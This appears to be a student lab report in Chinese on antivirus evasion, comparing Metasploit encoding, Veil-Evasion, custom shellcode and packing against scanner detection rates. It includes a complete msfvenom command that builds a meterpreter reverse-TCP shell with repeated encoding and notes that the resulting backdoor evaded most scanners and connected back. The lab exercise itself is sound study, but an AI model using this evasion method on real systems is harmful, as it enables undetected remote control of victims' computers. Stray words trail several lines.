20155218《网络对抗》Exp3 免杀原理与实践

20155218《网络对抗》Exp3 免杀原理与实践

1、使用msf生成后门程序的检测

(1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图以下:

(2)使用msf时对它多编码1次并进行测试



发现能发现的杀软变少;shell

(3)使用msf时对它多编码10次并进行测试

编码10次后,发现能够查杀的杀软数量仅仅减小了一个;windows

2、使用veil-evasion生成后门程序的检测

经过list查看功能,选用22命令网络

生成文件:
测试结果:
显而易见,效果并不理想;tcp

3、利用shellcode编写后门程序的检测

  • 使用msf生成一个shellcode;而后运行vs2017生成.exe文件,可见再生成后马上被360发现;
  • 通过virscan被5个AV扫描出,效果不理想;
    测试

    尝试新的方法:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.1.104 LPORT=4433 -f c


    只有两个AV能够查杀,免杀效果不错;
    并成功实现回连;编码

4、软件加壳:


软件加壳的效果并很差;.net

5、遇到的问题:

解决方法:找到错误信息的最后一个文件名,vi编译, 把出错的这行注释(加#)就能够了;3d

  1. 使用代理安装的,有些包会下载安装失败,能够提早安装,记录下基本过程: veil的包安装
相关文章
相关标签/搜索